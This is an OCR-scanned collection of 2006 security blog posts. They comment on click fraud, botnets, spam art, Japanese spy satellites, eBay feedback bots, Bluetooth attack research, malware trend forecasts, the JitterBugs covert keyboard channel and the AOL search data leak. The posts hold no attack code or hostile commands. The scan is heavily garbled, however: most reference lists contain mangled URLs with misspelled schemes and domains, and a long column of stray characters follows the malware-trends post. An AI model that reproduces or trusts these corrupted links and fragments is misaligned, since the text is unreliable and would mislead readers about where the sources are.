key issue to deal with, if they want to [4]continue beating Wall Street’s expectations. Last 
week [5]Google released [6]a commissioned report evaluating their anti click fraud methods, 
here’s an excerpt on the four lines of defense : 


"Google has built the following four ‘lines of defense’ for detecting invalid clicks: pre- 
filtering, online filtering, automated offline detection and manual offline detection, 
in that order. Google deploys different detection methods in each of these stages: the 
rule-based and anomaly-based approaches in the pre-filtering and the filtering stages, the 
combination of all the three approaches in the automated offline detection stage, and the 
anomaly-based approach in the offline manual inspection stage. This deployment of different 
methods in different stages gives Google an opportunity to detect invalid clicks using alter- 
native techniques and thus increases their chances of detecting more invalid clicks in one of 
these stages, preferably proactively in the early stages." 


Despite Eric Schmidt’s comments on [7]click fraud as "self correcting" issue, [8]Mark Cuban 
takes another perspective | find a very relevant one.The key remains the balance between 
Google’s technologies and efforts to build awareness on the problem, very informative report. 
Pay-per-click is a powerful model forwarding the responsibility for eventual transactions to 
the advertiser’s value added propostion, as compared to a [9]Pay per action model. | doubt 
Google would have ever reached [10]a stock split debate in its history if it were to use one. 


Moreover, with the growing interest in a [11]Pay-per-call model and the [12]rise in [13]voice 
phishing, it turns the trend into a hot one to keep an eye on for the upcoming future. 


1. http: //photos1. blogger. com/blogger/1933/1779/1600/click_click. jpg 
2. http: //finance.google.com/finance?q=google 

3. http://en.wikipedia.org/wiki/Long_tai 
4. 


ttp://www.marketwatch.com/News/Story/Story.aspx?dist=newsf inder&siteid=googlekguid=4,7B635681E2-7667-49FC 


Bee espace succes coped anata narod 

6. http: //googleblog. blogspot . com/2006/07/findings-on-invalid-clicks.htm 
7, jncep://blog. sear chenginevatch.cou/10g/060710-080763 

8. hep: / ows. blognaver ick. con/entry/123400087007S786/ 

o, heep://batteLenedia, con/archives/002667 pig 
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2.7.24 Splitting a Botnet’s Bandwidth Capacity (2006-07-26 20:29) 


[1] ™ Metaphorically speaking, | always say that the masssess of end users’ bandwidth 
is reaching that of a mid size ISP, while the lack of incentives or plain simple awarenss is 
resulting in today’s easily assembled botnets. Freaky perspective, but that’s what | perceive 
the trade-off out of this [2]major economic boost given the improved connectivity [3]France 
Telecom is about to offer to its customers in 2007/2008 - [4]Fiber at Home with 2.5Gbits/s 
download, and 1.2Gbits/s upload. As it looks like, an end user is gonna be worth a hundred 
more infected ones in the near future. 


[5]More on malware. 


1. http://photos1.blogger .com/blogger/1933/1779/1600/zombie_puppets. jpg 


2. http: //www.oecd.org/document/26/0, 2340, en_2649_34255_16220890_1_1_1_1,00.htm 


3. http://translate.google.com/translate?u=http/3A,2F,2Fwww.presence-pc.com/2Factualite/2Fftth-experience-18 
4, hvep://sleshdov.org/ervicles/06/07/26/127206. shea 
5. http://adanchev blogspot. con/2006/07 /nalvare~ search-engine. hal 


2.7.25 The Beauty of the Surrealistic Spam Art (2006-07-27 02:03) 


[1] * Given the volume of spam representing over 50 % of the world’s email traffic, obviously 
to some it represents a huge sample to draw sadness or anger out of, and of course, visualize 
the findings. [2]One man’s spam is Alex Dragulescu’s art : 


"He doesn’t use Photoshop but simply writes code to create computer art. For the [3]Spam 
Plants, he parsed the data within junk e-mail-including subject lines, headers and footers-to 
detect relationships between that data. Then he visually represents those relationships. For 
example, the program draws on the numeric address of an e-mail sender and matches those 
numbers to a color chart, from 0 to 225. It needs three numbers to define a color, such as teal, 
so the program breaks down the IP address to three numbers so it can determine the color 
of the plant. The time a message is sent also plays a role. If it’s sent in the early morning, 
the plant is smaller, or the time might stunt the plant’s ability to grow, Dragulescu said. The 
size of the message might determine how bushy the plant is. Certain keywords, such as 
"Nigerian," might trigger more branches. But Dragulescu did not inject any irony. Messages 
about Viagra do not grow taller, for example." 


| feel that now every spammer can pretend about being a stylish art admirer, with his 
spamming historical performance hanging on the wall, or perhaps it’s my surrealistic black 
humor. 


Related posts on spam and visualization : 

[4]Fighting Internet’s email junk through licensing 

[5]An Over-performing Spammer 

[6]Consolidation, or Startups Popping out Like Mushrooms? 
[7]Dealing with Spam - The O’Reilly.com Way 


[8]Visualization, Intelligence and the Starlight project 
[9]Visualization in the Security and New Media world 
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. http://photos1. blogger. com/blogger/1933/1779/1600/spam_plants.0. jpg 
. http: //news.com.com/Onetmanstspamtistanotherstart/2100-1025_3-6098479.htm 
. http: //www.sq.ro/spamplants.php 


http: //ddanchev. blogspot .com/2006/04/fighting-internets-email-junk-through.htm 


. http: //ddanchev. blogspot .com/2006/06/over-performing-spammer . htm 
. http: //ddanchev. blogspot .com/2006/06/consolidation-or-startups-popping- out .htm 
. http: //ddanchev. blogspot .com/2006/06/dealing-with-spam-oreillycom-way.htm 


ttp://ddanchev. blogspot .com/2006/01/visualization-intelligence-and.htm 


ttp://ddanchev. blogspot .com/2006/03/visualization-in-security-and-new. htm 


2.7.26 DVD of the Weekend - Path to War (2006-07-30 23:00) 


[1] * As I’ve been busy catching up with way too many things to list them, I’d better 
finalize my creativity efforts and provide you with the results as they appear during the 
week. Meanwhile, current events being constantly streamed and brainwashed from every TV 
channel you try to watch - remember how in [2]1984 only the party leaders had the privillege 
to turn off their 24/7 propaganda streams? Feel empowered nowadays - made me think 
on how today’s situation slightly represents the one filmed in the [3]Path to War, especially 
the partisan warfare activities. You can never win a partisan war, what you'll end up with is 
your ego and nose bleeding, and your heroistic wings sort of broken. Feeling, or positioning 
yourself for powerful PSYOPS while destroying a country’s infrastructure to eradicate the 
partisan fighters, is one of my favorite moments in the movie, especially when they realized 
how they’ve managed to destroy 140 % of Vietnam’s infrastructure and were still losing the 
war. 


Even worse, having to power and diplomatic influence to make a change,while being a 
beauraucrat to win time as someone else’s about to take care of your dirty laundry is such a 
bad example for the rest of the democratic world, yet a convenient one. 


Great post at DefenseTech on [4]Jautonomous warfare, destroy the oil resources to limit 
the movement of suppliers - have [5]a dozen of grannies move them on bycicles or take it 
personally, destroy a bridge, and see a wooden one build within day or two, every war is an 
act of terrorism by itself, where the term "acceptable levels of casualties" constantly jumps 
from the military to the political dictionary. 


Previous DVDs of the Weekend and related comments: 

[6]DVD of the Weekend - The Lone Gunmen 

[7]DVD of the Weekend - The Outer Limits - Sex And Science Fiction Collection 
[8]DVD of the Weekend - War Games 

[9]DVD of the Weekend - The Immortals 

[10]DVD of the Weekend - Lawnmower man - Beyond Cyberspace 


1 fiteps//photost. blogger. con/blogger/1988/1778/1600/B00006LSH3.02, 2222022. jpg 
| tp: //uww. ind, con/ it e/+20087209/ 

| http: //aww. imdb. con/tite/¢+0218505 / 

| http://www. defensetech.org/archives/003616 heal 

| http://www. emergent chaos.con/archives/2006/01 /shy_profiling_doesut_vork. bial 


ttp://ddanchev. blogspot .com/2006/02/dvd-of-weekend-1one-gunmen. htm 
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8. http: //ddanchev. blogspot . com/2006/03/dvd- of -weekend-war- games. htm 
9. http: //ddanchev. blogspot .com/2006/03/dvd-of-weekend-immortals.htm 
10. http://ddanchev. blogspot .com/2006/03/dvd-of-past-weekend.htm 


2.7.27 Japan’s Reliance on U.S Spy Satellites and Early Warning Missile Systems 
(2006-07-31 02:14) 


[1] *® With China breathing down Japan’s neck, and North Korea crying for attention by 
actively experimenting with [2]symmetric and [3]asymmetric warfare capabilities, Japan’s 
need for better reconnaissance, and limiting of its imagery gathering dependence has been in 
the execution stage for years as [4]Reliance on U.S. intelligence on missile launch shows need 
for improvement : 


"The two spy satellites currently in operation are both polar orbiters circling the globe 
at altitudes of 400 to 600 kilometers. If the fourth, a SAR satellite, is launched in 2007 as 
planned, it will complete the four-satellite reconnaissance system, and the country will be 
able to monitor any point on Earth at least once a day, Officials said. It will therefore become 
possible for Japan to monitor day-to-day changes in North Korean missile-launching sites. The 
problem, however, is if the system will be effective at the moment of a missile launch, which 
would depend on the weather and positions of the satellites at the time, officials said on 
condition of anonymity. In stark contrast with Japan, the United States has orbited more than 
100 satellites, at least 15 of which are reportedly for intelligence-gathering purposes, they 
said. As experts put it, the U.S. satellites can identify objects as small as 8 to 9 centimeters 
in size if weather conditions are ideal. The United States has five early-warning satellites, in- 
cluding one for backup purposes, keeping watch over North Korea around the clock, they said." 


[5] 
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Midcourse Phase 


RV | Countermeaseres 


They’re definitely using open source [6]IMINT on North Korea as well, or requesting detailed 
imagery on demand through [7]commercial providers, in between further developing their 
[8learly warning [9]systems. Go through an article on [10]Japan’s Information Gathering 
Satellites Imagery Intelligence in case you’re interested in their past efforts in this direction. 
However, | feel it’s their neighbors’ [11]cyber warfare capabilities they should be also worried 
about. 


Image courtesy of Northrop Grumman. 


. http: //photos1. blogger. com/blogger/1933/1779/1600/corona_first_spy_satellite.2.jpg 

. http: //ddanchev. blogspot .com/2006/07/travel-without-moving-north-korea. html 

http: //ddanchev. blogspot .com/2006/07/north-koreas- cyber-warfare-unit-121.html 

http://www. yomiuri.co.jp/dy/national/20060731TDY03003. htm 

http: //photos1.blogger.com/blogger/1933/1779/1600/testbed_hr. jpg 

http: //ddanchev. blogspot .com/2006/07/open- source-north-korean-imint. html 

http://www. lockheedmartin. com/wms/findPage .do?dsp=fec&ci=13088krsbci=12975&fti=0&ti=0ksc=400 
http://www. lockheedmartin. com/wms/findPage .do?dsp=fec&ci=13169&%rsbci=12975&amp ; amp ; ft i=O&ti=0k&sc=400 
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. http: //www.northropgrumman.com/missiledefense/About_MD. html 
10. http://www.fas.org/spp/guide/japan/military/imint/index.html 
11. http: //ddanchev.blogspot.com/2006/05/whos-who-in-cyber-warfare. html 
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2.7.28 Things Money Cannot Buy (2006-07-31 21:42) 


[1] * 1. Love with tingles 

. True Friends 

. Respect, one when the results go beyond the position and size of market capitalization 
Style 

. Childhood full of joy 

. Knowledge, diploma and insider leaks are something else 

. And obviously Innovation as you can see at this slide and compare it to the rough reality 
for [2]the top tech R &D spenders. 800 pound market capitalization gorillas for sure, but not 
innovators. A knowledge driven society results in [3]talent wars - [4]permanently attracting 
the walking case studies is also important. 


NOURWN 


Outspending ends up in [5]budget allocation myopia, compared to actually prioritizing 
your R &D efforts. You aren’t productive when you have all the cash in the world, exactly the 
opposite, and passion does play a crucial role when it comes to creativity. Go through a handy 
summary of a study on [6]Does R &D spending deliver results? as well. 


ttp://photos1.blogger .com/blogger/1933/1779/1600/RD_spending. jpg 


ttp://paul.kedrosky .com/archives/2006/07/28/microsofts_anti.htm 
ttp://www.forbes.com/columnists/columnists/forbes/2005/1031/045 .htm 


1. 
2. 
3. 
4. http://en.wikipedia.org/wiki/Science_and_technology_in_the_United_States#Science_immigratio: 
5. 
6. 


ttp://ddanchev.blogspot.com/2006/07/budget-allocation-myopia-and.htm 
ttp://www.businessweek.com/the_thread/techbeat/archives/2005/10/does_rd_spendin.htm 


2.8 August 
2.8.1 But Of Course It’s a Pleasant Transaction (2006-08-02 15:02) 


[1] * Great example of [2]Jautomated bots attacking Ebay’s core trust establishing process- 
the feedbacks provided by users taking advantage of [3]the wisdom of crowds to judge on 
their truthfulness : 


"Again, a sharp eye may notice that feedback comments received from sellers are iden- 
tical, and read almost in the same order. This is because most 1-cent-plus-no-delivery-cost 
sellers automate the whole transaction: should someone buy their eBooks for one cent 
each, some scripts email it automatically to the buyer, and leaves a standard feedback com- 
ment on the buyer's profile. So, if we recollect everything, the following is probably happening: 


1. Someone is massively creating randomly named, fake user accounts (probably in a 
more or less automated fashion). 

2. Those fake users, powered by automated web spider software, are set to scavenge eBay 
for 1-cent "buy it now" items and buy them. 

3. Automatically, the 1-cent item seller script is emailing the buyer with the item, and posts 
its standard feedback on his profile. 

4, The fake user automatically responds with a standard feedback comment on the seller’s 
profile. 
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In a nutshell: Two bots are talking. And doing business." 


The use of CAPTCHAs, and ensuring the bots never manage to register themselves, is 
as important as the automated [4]the process of bypassing CAPTCHA authentication . Expect 
to see a much better random generation of pseudo users, and their feedbacks compared to 
these one. And since [5]Ebay is no longer an intermediary, but a platform, bots got plenty of 
seed data to begin their life with, don’t they? 


These very same techniques apply to common networks such as the Internet Relay Chat, 
and the majority of instant messengers where malware tries to, either take advantage of a 
momentum and forward itself to a buddy, or keep the discussion going until the time for a 
fancy photo session exchange has come. 


http: //photos1. blogger. com/blogger/1933/1779/1600/sellerprofileck1. jpg 
ttp://www.fortinet .com/FortiGuardCenter/reports/roundup_july_2006.htm 


1. 
2. 
3. http://en.wikipedia.org/wiki/The_Wisdom_of_Crowds 
4. 
5. 


http://sam.zoy.org/pwntcha/ 


ttp://developer.ebay.com/ 


2.8.2 One Time Password Generating Credit Card (2006-08-03 01:39) 


[1] 
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© CNET Networks 


This is cute as it solves a major problem with customers having to use, and more easily lose 
tokens. Neat integration with the push of a button on the [2]one time password generating 
credit card : 


"It took InCard four years to develop the card, Finkelstein said. The company combined 
technology from a Taiwanese display maker, a U.S. battery manufacturer and a French secu- 
rity team, he said. A Swiss partner, NagralD, owns the rights to the process to combine the 
pieces and actually manufacture the technical innards of the card. The biggest development 
challenges were the ability to bend the card, power consumption and thickness, Finkelstein 
said. The result is a card that’s as thin and flexible as a regular credit card and is guaranteed 
to work for three years and 16,000 uses. "Which is about 15 times a day, seven days a week," 
Finkelstein said." 


Compliance with the FFIEC, or an emerging trend of convergence, trouble is it doesn’t 
solve the majority of issues related to phishing attacks, rather it has the potential to under- 
mine other companies’ offerings. Now all they need is someone who'll take the role of an 
evangelist besides the well networked company executives. 


Related posts: 
[3]Anti Phishing Toolbars - Can You Trust Them? 
[4]Heading in the Opposite Direction 
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[5]No Anti Virus Software, No E-banking for You 


1. http: //photos1. blogger. com/blogger/1933/1779/1600/credit_card_authentication. jpg 


2. http: //news .com. com/A+password+fort+tyourt+credit+cards/2100-1029_3-6101121.html1 


3. http: //ddanchev. blogspot .com/2006/03/anti-phishing-toolbars-can-you-trust.htm 
4. http: //ddanchev. blogspot .com/2006/04/heading-in-opposite-direction.htm 


5. http: //ddanchev. blogspot .com/2006/05/no-anti-virus-software-no- e-banking .htm 


2.8.3 Achieving Information Warfare Dominance Back in 1962 (2006-08-03 19:36) 


[1] * The point here isn’t [2]the consolidation indicated in the article : 


"The consolidation involves Singer’s headquarters staff, and subordinate Naval Security 
Group Activities (NSGA) and detachments (NSGD). When fully completed, the action will 
combine the Navy’s enlisted Cryptologic Technicians and Information Warfare officers into 
the same organization as the Navy’s Information Systems Technicians and Information Profes- 
sional officers. The lO warfare area is composed of five core integrated capabilities: Electronic 
Warfare, Computer Network Operations, Psychological Operations, Military Deception and 
Operational Security. These combine with related capabilities to provide “Information Domi- 
nance,” the concept of controlling an adversary’s use of the information and communications 
environment while protecting one’s own." 


but the advances of intercepting electromagnetic emissions reflected off the Moon back 
in 1962, through the NRRO 600-Foot Steerable Parabolic Antenna : 


"Naval Radio Research Observatory (NRRO). This observatory is to be erected at [3]Sugar 
Grove, West Virginia for exploiting lunar reflective techniques for the purposes of intelligence 
collection, radio astronomy, and communications-electronics research. A 600-foot steerable 
parabolic radio antenna will provide for the reception of electromagnetic emissions reflected 
off the moon. As an intelligence device it will provide for reception and analyzing emissions 
from areas of the world not now accessible by any other known method, short of physical 
penetration. The Observatory is planned to be operational in FY 1962." 


Here’s [4]more info on the [5]concept : 


"Although the 600-ft telescope was never built, a satellite-based alternative, called ‘[6]GRAB’ 
([7]Galactic RAdiation Background), was launched in June of 1960. Again, this was a dual-use 
system. The world’s first elint satellite and astronomical observatory were integrated into the 
same satellite bus, with astronomy serving as an operational front for the whole. A second 
GRAB was launched in 1962. This interface of classified and basic research tells us about the 
pursuit of science and science-based technologies during the Cold War." 


Nowadays it just seems to be full of bird listeners using parabolic microphones, [8]ac- 
tivists "hacking" TV and Radio signals, and others conducting sophisticated [9]TECHINT on the 
war field. 


Related resources: 
[10]InformationWarfare 
[11]Cyber Warfare 
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[12]PSYOPS 
[13]Intelligence 
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. http://photos1. blogger .com/blogger/1933/1779/1600/sugargrove. jpg 

. http://cryptome.org/echelon-reorg.htm 

. http://eyeball-series.org/sugar-eyeball .htm 

. http://sss.sagepub.com/cgi/content/abstract/31/2/20 

. http: //www.gb.nrao.edu/~rcreager/GBTMetrology/documentation/gbtmemo/gbtmemo166.htm 

. http://www.fas.org/spp/military/program/sigint/grab.htm 

. http://www.military.com/Resources/ResourceFileView/GRAB.htm 

. http: //www.naharnet.com/domino/tn/NewsDesk.nsf/0/236DD3CF2B77BB52C22571BDOO06DB6EC? OpenDocument 
. http: //www.fas.org/blog/secrecy/2006/07/dod_manual_on_technical_intell.htm 
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2.8.4 Mobile Devices Hacking Through a Suitcase (2006-08-04 04:27) 


[1] ™ [2]Define:nerd 


"Luca Carettoni and Claudio Merloni are security consultants at Milan, Italy-based Secure Net- 
work. The two created the BlueBag to raise awareness about the potential of attacks against 
Bluetooth-enabled devices, they said in an interview at the Black Hat security event in Las 
Vegas. The BlueBag is a roll-aboard suitcase filled with hardware. That gear is loaded with 
software to scan for Bluetooth devices and launch attacks against those, the two men said. 
We started evaluating how Bluetooth technology was spread in a metropolitan area, Carettoni 
said. We went around airports, offices and shopping malls and realized that a covered bag can 
be used quite effectively for malicious purposes." 


Outstanding execution of the idea, | still wonder what would the content of the suitcase look 
like through an X-ray if they ever get to pass through one of course. Go through the entire 
[3]photo session at [4]Black Hat 2006, by Joris Evers @CNET NEWS.com’s team, as well as 
over the basics of [5]bluetooth [6](in)security. 


1. http://photos1.blogger .com/blogger/1933/1779/1600/Bluebag2.1. jpg 
2. http: //www.google.com/search?hl=en&q=def ine/%3Anerd 

3. http: //news.com.com/2300-7349_3-6102103-1.htm 

4. http://www. blackhat .com/htm1/bh-usa-06/bh-usa-06-schedule .htm 
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6 


. http: //www.securityfocus.com/infocus/1830 


. http: //www.securityfocus.com/infocus/1836 


2.8.5 Future in Malicious Code 2006 (2006-08-05 17:43) 


[1] * What’s new on the [2]malware front? Quite some [3]new developments to be included 
in Q2’s summary for 2006, I’m about to finalize any time now. Just came across to a [4]great 
continuation of my original [5]Malware - Future Trends publication, this time courtesy of the 
Royal Canadian Mounted Police, [6]quoting and further expending the discussion on my key 
points : 
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- Mobile malware will be successfully monetized 

- Localization as a concept will attract the coders’ attention 

- Open Source Malware 

- Anonymous and illegal hosting of (copyrighted) data 

- The development of Ecosystem 

- Rise in encryption and packers 

- Oday malware on demand 

- Cryptoviral extortion / Ransomware will emerge 

- When the security solutions (antivirus etc.) ends up the security problem itself 
- Intellectual property worms 

- Web vulnerabilities, and web worms - diversity and explicit velocity 

- Hijacking botnets and infected PCs 

- Interoperability will increase the diversity and reach of the malware scene 


A brief summary : 


"This report will provide an overview of the numerous malicious code trends experts are 
observing and those they predict will be seen in the foreseeable future. This is not a document 
that will chart the future of malicious code as that would be impossible. Malware writers move 
very quickly. They are adaptable and very often they are exploiting vulnerabilities before 
the rest of the security industry is fully aware of them. Their flexibility and reaction speed is 
essential if they wish to continue to make a profit and stay ahead of the anti-virus companies 
who are constantly devising new ways to detect and remove hostile code. As a result, some 
of the trends covered in this document may never fully evolve and others that have not been 
mentioned will, no doubt, appear.This document will give readers a better sense of what is 
coming “down the pipe” and perhaps, a better idea of what to look for when dealing with 
tomorrow’s malicious code." 


Professionally [7]questioning a vendor’s or mogul’s self-mythology is the anti-mogul spe- 
ciality. Don’t just slice the threat on pieces and take credit for slicing it, let’s discuss the pie 
itself. 


Meanwhile, keep an eye on my [8]Delicious Information Warfare summaries, and [9]syn- 
dicate them if time equals [10]opportunities. 
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. http: //ddanchev. blogspot .com/2006/02/recent-malware-developments.htm 
. http: //ddanchev. blogspot .com/2006/07/malware-search-engine.htm 
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. http://www. packetstormsecurity.org/papers/general/malware-trends. pdf 


. http: //ddanchev. blogspot .com/2006/07/security-research-reference- coverage. html 


+ 
+ 
S 
~ 
z 
a 
a 
4 
g 
we} . 
09 
4 
a 
09 
a 
i) 
iy 
™~ 
+ 
n 
o 
~ 
g 
o 
n 
~ 
Es 
ct 
n 
0) 
a 
~ 
m 
NS) 
° 
S 
iS) 
0) 
9g 
a. le 


ct 
ct 
ue] 
N 
~N 
a 
ro 
o 
=] 
a 
ima 
o 
<i 
ion 
# 
° 
0Q 
un 
ue) 
fe} 
ct 
fa) 
fe} 
B 
~N 
N 
ro) 
ro) 
a 
~ 
ro) 
a 
N 
low 
o 
a 
ct 
H 
8 
o 
4 
oO 
i) 
a 
H 
[= 
0a 
4 
° 
=} 
o 
H 
=) 
a 
ima 
ct 
B 


. http: //ddanchev. blogspot .com/2006/07/delicious-information-warfare-2707 .htm 
. http://del.icio.us/rss/DDanche 
10. http://del.icio.us/DDanche 


OMNAUARWNEH 


2.8.6 DVD of the Weekend - The Final Cut (2006-08-06 20:26) 


[1] * This [2]weekend’s featured DVD is a marvelous representation of a full-scale 1984 type 
of mass surveillance society, but compared to an utopian party acting as the caring BigBrother, 
here it’s the inavitable advances of technology, and availability of services leading to the 
ultimate digital preservation of our entire living - through our own eye-embedded implants. 
Worth taking your time to watch this "remixing" of reality leading to the ultimate saint, but | 
have to agree with SFAM’s comments on the "usefulness" of the technology for compiling a 30 
min funeral clip only. The rest is the plot itself. 


A brief [3]summary of [4]The Final Cut : 


"IN a near undefined future, people may have a Zoe microchip implanted in their ner- 
vous system to permit their families retrieve the best moments of their memories and watch 
on video after their deaths. This process is called "Rememory" and Alan H. Hakman (Robin 
Williams), a man traumatized by an incident in his childhood, is the best cutter of the Eye Tech 
Corporation. The company is facing groups that oppose to the "Rememory" and the ex-cutter 
Fletcher (Jim Caviezel) is leading these opponents. When Alan is assigned to prepare the final 
cut of the memories of the Eye Tech lawyer Charles Bannister, his Zoe chip is disputed by 
Fletcher. Meanwhile, Alan finds that he has also an implanted microchip, which is against the 
rules of a cutter." 


You can also go through [5]CyberPunkReview’s comments and snapshots of The Final 
Cut. 


Related resources: 
[6]Surveillance 
[7]Privacy 


UPDATE: Seems like [8]Blogspot is only searching through 7 out of my [9]209 posts, and 
ignoring the conspiracy theory you can still do it the old fashioned way - [10]Surveillance, 
[11]Privacy, [12]Malware, [13]Censorship, [14]Cyber terrorism, [15]Intelligence, etc. 


1 
2 
3. 

4. 

5. 
6. 

7 

8. 

9 


ttp://search. blogger. com/?q=blogur1:ddanchev. blogspot. com&hl=enkie=UTF-8xui=blg 
ttp://www.google.com/search?hl=enklr=k%q=site/3Addanchev. blogspot.com 
://www. google. com/search?hl=enklr=kq=site/3Addanchev. blogspot .com+surveillance 


://waw. google. com/search?hl=enklr=kq=site/3Addanchev. blogspot .com+privac 


://www. google. com/search?hl=enklr=kq=site/3Addanchev. blogspot .com+malware 


://www. google. com/search?hl=enklr=kq=site/3Addanchev. blogspot .com+censorship 


://www. google. com/search?hl=enklr=kq=site/3Addanchev. blogspot .comt+cyber+terrorism 


://www.google.com/search?hl=enklr=kq=site/3Addanchev. blogspot .com+intelligence 
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2.8.7 Malware Bot Families, Technology and Trends (2006-08-07 00:43) 


[1] In case you want to know more about the evolution of bots, 
and ease of assembling a botnet, why families take the largest zombie share compared to 
single bachelors only, or which technologies dominate the threatscape - go through the slides 
of this study on identifying "interesting" bot technologies within a large malware collection. 
[2]Bot Feature & Technology Trends by Robert Lyda also highlights distribution of bot variants 
from the following families : 


GaoBot 
SpyBot 
MyTob 
PolyBot 
PoeBot 
gBot 
BrepiBot 
DanishBot 
NetBot 
KvdBot 
TriBot 
TongBot 
SdBot 
KwBot 
BugBot 


As well as: 


- Emergence of Bots as of eggdrop’s 1993 appearance 
- 2005 Bot Family Percentage per Month 

- Bot Feature Percentage of All Variants 

- Bot Feature Percentage Over All Variants 

- Bot Technology Trends for 2005 

- Bot Packing Analysis 

- Prelevance of the Top 12 Packing Tools 


To bottom line - bot families result in anti virus software detecting over 200,000 pieces 
of malware already, trouble is the majority of them have long converted into family members 
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rather than staying bachelors only as it used to be. Malware on demand and Open Source 
Malware, combined with the ease of packing, are definitely making their impact. 


Related resources and posts: 

[3]Malware 

[4]Splitting a Botnet’s Bandwidth Capacity 
[5]An Intergalactic Security Statement 
[6]Malware Search Engine 


1, ftp://photost. blogger con/tlogger/1030/1776/1600/BarbaPapa_n,Fanily git 
2, http://my.gtisc. gatech.edu/arovorkshop/ppt/BotnetTrends_Lyda.ppt 

3, hetp://del. icio.us/DDanchev/Halvare 

4, http://ddanchey blogspot .con/2006/07/splitting-botnets-bandvidth- capacity. héall 
5. http: //ddanchev. blogspot . com/2006/07/intergalactic-security-statement .html 

6. http://ddanchey blogspot. con/2006/07 /malvare- search-engine. html 


2.8.8 JitterBugs - Covert Keyboard Communication Channels (2006-08-09 05:27) 


* [1]WarTyping, [2]keyboard acoustic emanations, and here comes a full-scale covert 


espionage tool recently discussed in an in-depth research at the 15th USENIX Security Sympo- 
sium. Researchers at the CS department of University of Pennsylvania developed a working 
prototype of a [3]JitterBug Covert Channel : 


"This paper introduces JitterBugs, a class of inline interception mechanisms that covertly 
transmit data by perturbing the timing of input events likely to affect externally observable 
network traffic. JitterBugs positioned at input devices deep within the trusted environment 
(e.g., hidden in cables or connectors) can leak sensitive data without compromising the 
host or its software. In particular, we show a practical Keyboard JitterBug that solves 
the data exfiltration problem for keystroke loggers by leaking captured passwords through 
small variations in the precise times at which keyboard events are delivered to the host. 
Whenever an interactive communication application (such as SSH, Telnet, instant messaging, 
etc) is running, a receiver monitoring the host’s network traffic can recover the leaked data, 
even when the session or link is encrypted. Our experiments suggest that simple Keyboard 
jitterBugs can be a practical technique for capturing and exfiltrating typed secrets under 
conventional OSes and interactive network applications, even when the receiver is many hops 
away on the Internet." 


The trade-off remains on whether [4]physically restoring the device would remain unde- 
tected, compared to directly streaming the output outside the network. I'll go for the covert 
network timing whereas insecurities and flexibility are always a matter of viewpoint. 


UPDATE: The future defined - [5]Projection Keyboards 


Related resources: 

[6]Espionage Ghosts Busters 

[7]Covert Channel 

[8]Gray-World Team 

[9]IP Covert Timing Channels: An Initial Exploration 
[10]Information Theory of Covert Timing Channels 
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[11]Detection of Covert Channel Encoding in Network Packet Delays 


. http: //www.almaden.ibm.com/software/projects/hdb/Publications/papers/ssp04. pdf 
. https: //db.usenix.org/events/sec06/tech/shah/shah_html/index.htm 


1 
2 
3 
4 
5. http://w. alpern.org/eblog/stories/2003/01/09/projectionkeyboards. html 
6. http: //ddanchev. blogspot .com/2006/05/espionage-ghosts-busters .html 

7. netp://en. wikipedia. org/viki/Covert_ channel 

8. http: //gray-vorla.net/ 

9 


. http: //www.cs.georgetown.edu/~clay/research/pubs/cabuk.ccs2004. pdf 
10. http://www.eecs. berkeley. edu/~ananth/2005+/Aaron/VA_ArmeniaNew.pdf 


11. http://www.ists.dartmouth.edu/library/149.pdf 


2.8.9 Big Momma Knows Best (2006-08-09 06:06) 


[1] Wish it was the [2]Chinese equivalent of Big Brother I’m 
refering to, in this case it’s [3]a mother of six tracking down teenagers who toilet-papered her 
house, and mind you, she didn’t even bother to use MySpace, instead : 


"Base persuaded supermarket managers to tally daily toilet-paper buys for the week 
and a Stater Bros. manager said there was a run on bathroom tissue two days before her 
home was vandalized. At 7:30 p.m. Feb. 17, someone bought 144 rolls of toilet paper, cheese, 
dog food, flour and plastic forks, the same items found on her lawn and house. It was a cash 
transaction, making it difficult to trace the purchaser, but the store had video surveillance. 
The video showed four teenagers making the purchase, one of them wearing a Norco High 
School letterman’s jacket with a name stitched across the back. The store’s parking lot 
surveillance camera showed the truck they were using. Base then borrowed a Norco High 
yearbook and used online databases to get the name, phone numbers and addresses of the 
teens on the store tape." 


One question remains though. If she managed to socially engineer the supermarket’s 
staff to pass her transactions info, even a surveillance camera footage, | wonder where they 
were shopping from, and would her detective work findings hold in court given how they were 
obtained. What if they used a distributed shopping practice? 


You may also find a previous post on [4]Big Brother in the Restroom, a relevant one. 


UPDATE: [5]Great post at Angela Gunn’s Tech Space. Keep your friends close, your 
neighbors closer! 


1. http: //photos1. blogger. com/blogger/1933/1779/1600/big_mamma. jpg 
2. http://en.wikipedia.org/wiki/Big_mama 
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3. http://news.yahoo.com/s/ap/toilet_paper_caper 
4. http://ddanchev. blogspot .com/2006/06/big-brother-in-restroom. htm 
5. http://blogs .usatoday.com/techspace/2006/08/big_brother_lit.htm 


2.8.10 AOLs Search Leak User 4417749 Identified (2006-08-10 00:21) 


[1] * A Chief Privacy Officer and basic common sense anyone? 


As you all know, during the weekend [2]20M search queries of 650,000 AOL users leaked, and 
are all over the Internet available for download. It’s simple unbeliavable that the only measure 
to ensure the privacy of the data was the "unique ID", and how often does the excuse of 
improving search results pop out. No need for subpoenas this time, but basic use of filtering 
techniques. 


Seems like [3]AOL searcher 4417749 has been identified by a NYtimes reporter : 


"Buried in a list of 20 million Web search queries collected by AOL and recently released on 
the Internet is user No. 4417749. The number was assigned by the company to protect the 
searcher’s anonymity, but it was not much of a shield. No. 4417749 conducted hundreds 
of searches over a three-month period on topics ranging from “numb fingers” to “60 single 
men” to “dog that urinates on everything.” And search by search, click by click, the identity 
of AOL user No. 4417749 became easier to discern. There are queries for “landscapers 
in Lilburn, Ga,” several people with the last name Arnold and “homes sold in shadow lake 
subdivision gwinnett county georgia.” It did not take much investigating to follow that data 
trail to Thelma Arnold, a 62-year-old widow who lives in Lilburn, Ga., frequently researches 
her friends’ medical ailments and loves her three dogs. “Those are my searches,” she said, 
after a reporter read part of the list to her." 


Hope AOL gets to win the [4]Big Brother Awards, nominated for sure. 


Related resources and posts: 

[5]Privacy 

[6]Still worry about your search history and BigBrother? 

[7]The Feds, Google, MSN’s reaction, and how you got "bigbrothered"? 
[8]What search engines know, or may find out about us? 

[9]Security vs Privacy or what’s left from it 

[10]Snooping on Historical Click Streams 

[11]Brace Yourself - AOL to Enter Security Business 


1 hicep//photost logger con/blogger/1083/1770/1600 [Caring Big Brother.0.g14 
2. http: //waw.gregsadetsky .com/aol-data/ 

3. http://www.nytimes.com/2006/08/09/technology/09aol .htm1?ei=5065&en=f 83b62ef c45c1112&amp ; amp ; ex=1155700800 
4. hetp://v. privacy international org/ibd 

5, huep://det cio. us/DDancnev/Privacd 
